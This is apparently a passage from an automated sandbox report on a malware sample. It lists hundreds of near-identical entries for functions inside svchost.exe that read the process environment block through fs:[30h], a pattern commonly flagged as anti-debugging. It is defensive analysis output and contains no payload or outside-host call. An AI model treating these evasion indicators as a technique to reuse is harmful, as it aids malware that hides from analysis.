            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730750 mov eax, dword ptr fs:[00000030h]2_2_03730750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE75D mov eax, dword ptr fs:[00000030h]2_2_037BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4755 mov eax, dword ptr fs:[00000030h]2_2_037B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov esi, dword ptr fs:[00000030h]2_2_0376674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov ecx, dword ptr fs:[00000030h]2_2_0376273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AC730 mov eax, dword ptr fs:[00000030h]2_2_037AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730710 mov eax, dword ptr fs:[00000030h]2_2_03730710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760710 mov eax, dword ptr fs:[00000030h]2_2_03760710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C700 mov eax, dword ptr fs:[00000030h]2_2_0376C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE7E1 mov eax, dword ptr fs:[00000030h]2_2_037BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C0 mov eax, dword ptr fs:[00000030h]2_2_0373C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B07C3 mov eax, dword ptr fs:[00000030h]2_2_037B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037307AF mov eax, dword ptr fs:[00000030h]2_2_037307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E47A0 mov eax, dword ptr fs:[00000030h]2_2_037E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D678E mov eax, dword ptr fs:[00000030h]2_2_037D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03762674 mov eax, dword ptr fs:[00000030h]2_2_03762674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374C640 mov eax, dword ptr fs:[00000030h]2_2_0374C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E627 mov eax, dword ptr fs:[00000030h]2_2_0374E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03766620 mov eax, dword ptr fs:[00000030h]2_2_03766620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768620 mov eax, dword ptr fs:[00000030h]2_2_03768620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373262C mov eax, dword ptr fs:[00000030h]2_2_0373262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772619 mov eax, dword ptr fs:[00000030h]2_2_03772619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE609 mov eax, dword ptr fs:[00000030h]2_2_037AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0376A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov eax, dword ptr fs:[00000030h]2_2_0376A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037666B0 mov eax, dword ptr fs:[00000030h]2_2_037666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C6A6 mov eax, dword ptr fs:[00000030h]2_2_0376C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6500 mov eax, dword ptr fs:[00000030h]2_2_037C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037325E0 mov eax, dword ptr fs:[00000030h]2_2_037325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037365D0 mov eax, dword ptr fs:[00000030h]2_2_037365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E59C mov eax, dword ptr fs:[00000030h]2_2_0376E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov eax, dword ptr fs:[00000030h]2_2_03732582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov ecx, dword ptr fs:[00000030h]2_2_03732582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764588 mov eax, dword ptr fs:[00000030h]2_2_03764588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC460 mov ecx, dword ptr fs:[00000030h]2_2_037BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA456 mov eax, dword ptr fs:[00000030h]2_2_037EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372645D mov eax, dword ptr fs:[00000030h]2_2_0372645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375245A mov eax, dword ptr fs:[00000030h]2_2_0375245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A430 mov eax, dword ptr fs:[00000030h]2_2_0376A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C427 mov eax, dword ptr fs:[00000030h]2_2_0372C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037304E5 mov ecx, dword ptr fs:[00000030h]2_2_037304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037644B0 mov ecx, dword ptr fs:[00000030h]2_2_037644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BA4B0 mov eax, dword ptr fs:[00000030h]2_2_037BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037364AB mov eax, dword ptr fs:[00000030h]2_2_037364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA49A mov eax, dword ptr fs:[00000030h]2_2_037EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CB7E mov eax, dword ptr fs:[00000030h]2_2_0372CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728B50 mov eax, dword ptr fs:[00000030h]2_2_03728B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEB50 mov eax, dword ptr fs:[00000030h]2_2_037DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]2_2_037E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]2_2_037E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB40 mov eax, dword ptr fs:[00000030h]2_2_037FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8B42 mov eax, dword ptr fs:[00000030h]2_2_037D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804B00 mov eax, dword ptr fs:[00000030h]2_2_03804B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EBFC mov eax, dword ptr fs:[00000030h]2_2_0375EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCBF0 mov eax, dword ptr fs:[00000030h]2_2_037BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEBD0 mov eax, dword ptr fs:[00000030h]2_2_037DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]2_2_037E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]2_2_037E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804A80 mov eax, dword ptr fs:[00000030h]2_2_03804A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEA60 mov eax, dword ptr fs:[00000030h]2_2_037DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA38 mov eax, dword ptr fs:[00000030h]2_2_0376CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA24 mov eax, dword ptr fs:[00000030h]2_2_0376CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EA2E mov eax, dword ptr fs:[00000030h]2_2_0375EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCA11 mov eax, dword ptr fs:[00000030h]2_2_037BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730AD0 mov eax, dword ptr fs:[00000030h]2_2_03730AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
